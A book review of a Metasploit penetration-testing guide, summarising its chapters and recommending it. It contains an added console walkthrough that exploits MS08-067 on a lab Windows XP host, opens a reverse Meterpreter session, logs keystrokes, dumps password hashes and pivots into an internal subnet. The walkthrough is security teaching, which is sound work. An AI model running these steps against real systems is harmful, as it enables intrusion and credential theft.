Book Review: Metasploit, The Penetration Tester’s Guide

Title: Metasploit, The Penetration Tester’s Guide. Copyright © 2011 by David Kennedy, Jim O’Gorman, Devon Kearns, & Mati Aharoni. Foreword by HD Moore. No Starch Press, Inc. (299 pages).

About the Authors

David Kennedy is Chief Information Security Officer at Diebold Inc. He is also an open-source tools developer and a member of the Back|Track and Exploit Database development teams. Jim O’Gorman is a pen tester with CSC’s StrikeForce, co-founder of Social-Engineer.org, and an instructor at Offensive Security. Devon Kearns is an instructor at Offensive Security, a Back|Track Linux developer, an administrator of The Exploit Database and maintainer of the Metasploit Unleashed wiki. Mati Aharoni is the creator of the Back|Track Linux distribution and founder of the security training company Offensive Security.

About the Book

According to HD Moore, Metasploit Chief Architect, “In this book, you will see penetration testing through the eyes of four security professionals with widely divergent backgrounds.” The book “covers the fundamental tools and techniques” of penetration testing “while also explaining how they play into the overall structure of a successful penetration testing process…Readers who are new to the field will be presented with a wealth of information not only about how to get started but also why those steps matter and what they mean in the bigger picture.”

The authors themselves write in the Preface that “This book is designed to teach you the ins and outs of Metasploit and how to use the Framework to its fullest.” The goal of the book is to provide a useful tutorial for the beginner and a reference for practitioners. Mindful that the Metasploit Framework is frequently updated with new features and exploits, the book emphasises Metasploit fundamentals which, once understood and practised, let the reader take frequent updates in their stride.

Summary

Although the book is not formally divided into sections, it can be read as one: Chapters 1 to 6 form the core, and the remaining 11 chapters build on and around it. The core section takes the pen tester, by way of worked examples, from the very basics of the craft through carrying out exploits to gaining value from the post-exploitation capabilities of Meterpreter.

The examples employ a combination of Back|Track, Ubuntu 9.04, Metasploitable, and Windows XP, where Back|Track serves as the vehicle for exploitation and the Ubuntu and Windows systems act as the targets. The most-used interfaces to the framework, msfconsole and msfcli, are introduced, and the GUI (Armitage) is mentioned briefly. Utilities such as msfpayload (which generates a chosen payload as raw shellcode, source code, or a stand-alone executable) and msfencode (which encodes a payload to avoid bad characters and, with limited success, anti-virus signatures), both of which give command-line access to framework features without entering msfconsole, are also introduced early on.

Chapters 3 to 5 cover intelligence gathering, vulnerability scanning and exploit execution respectively, while Chapter 6 introduces Meterpreter. Tools such as whois, Netcraft, nslookup and Nmap (including its TCP idle scan, which probes a target via a third-party “zombie” host so that the scan never originates from the tester’s own address) are introduced with good examples showing how their output can be interpreted usefully. Vulnerability scanning is explained through examples ranging from simple banner grabbing with netcat to full NeXpose and Nessus scans, as well as Metasploit’s own speciality auxiliary scanners, such as the modules that find VNC servers with no authentication and open X11 servers.

A whole chapter (#5) consists of walk-throughs of two specific exploits: one against Windows XP SP2 (vulnerability MS08-067) and one against an Ubuntu 9.04 virtual machine. Here, the detailed step-by-step explanation and interpretation of output is impressive. Finally, Chapter 6 walks through another exploit and then takes the pen tester through an overview of the Meterpreter features that can be employed, from capturing screenshots and keystrokes and dumping usernames and password hashes, through to pivoting onto connected hosts. For beginners, the above is enough to get up and running productively with Metasploit.
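As an added illustration (a constructed console session, not an excerpt from the book, with output omitted and all addresses assumed lab values), the following strings together the steps the review describes for Chapters 5 and 6: exploiting MS08-067 on the Windows XP target to obtain a Meterpreter session, then screenshots, keystroke capture, hash dumping, and finally pivoting into a second subnet that is reachable only from the compromised host. The attacker, target and internal subnet addresses are invented for the example.

```text
# Constructed example, not from the book. Assumed lab layout:
#   attacker (Back|Track): 192.168.33.129
#   target (Windows XP SP2): 192.168.33.130
#   internal subnet reachable only from the target: 10.10.1.0/24
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130
msf exploit(ms08_067_netapi) > set LHOST 192.168.33.129
msf exploit(ms08_067_netapi) > set LPORT 443
# If automatic target detection fails, list the OS/language targets and set one explicitly
msf exploit(ms08_067_netapi) > show targets
msf exploit(ms08_067_netapi) > exploit

# Post-exploitation: orient first, then collect
meterpreter > sysinfo
meterpreter > getuid
meterpreter > screenshot
meterpreter > keyscan_start
meterpreter > keyscan_dump
meterpreter > keyscan_stop
meterpreter > hashdump

# Pivoting: find the target's second interface, then route the 10.10.1.0/24
# subnet through this session so other modules can reach it
meterpreter > ipconfig
meterpreter > run autoroute -s 10.10.1.0/24
meterpreter > background
msf exploit(ms08_067_netapi) > route print
msf exploit(ms08_067_netapi) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > set RHOSTS 10.10.1.0/24
msf auxiliary(tcp) > set PORTS 445
msf auxiliary(tcp) > run
```

Two practical notes: `hashdump` relies on the session running with SYSTEM privileges, which a successful MS08-067 exploit provides directly, so no privilege escalation step is needed here; and the pivot only affects traffic generated from inside the framework (auxiliary and exploit modules), not tools run from the attacker’s shell, which would need a separate proxy or port forward.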

Thereafter, more focussed topics such as anti-virus detection and client-side exploitation are covered in detail. The book’s end section consists of a deep dive on customising and developing within the Metasploit Framework. The final chapter is a simulated pen test, from planning through to cleanup.

Conclusion

The craft of penetration testing is covered deeply and broadly. The book’s greatest source of value is how the concepts being applied are explained and demonstrated with well-annotated examples. The authors’ experience in formal instruction and practice is evident. This book achieves a good balance between concept and practicality. Though sub-titled “The Penetration Tester’s Guide”, the publisher could as well have chosen “A Guide to Penetration Testing” as a strap-line. I expect it to become a valuable resource in most pen testers’ libraries, whether they be novices or experienced practitioners.

Brian McSweeney
Brian McSweeney is currently a Network Designer, mostly in the UK Enterprise space. He came to Network Design from several years in Network Test Engineering, in particular, Performance & Scalability testing, primarily for Service Provider & Enterprise solution/equipment vendors. He blogs sporadically at http://packetspersecond.wordpress.com His LinkedIn page is http://uk.linkedin.com/in/brianmcsweeney He can also be found on Twitter as @BriMcS & G+ as Brian McSweeney.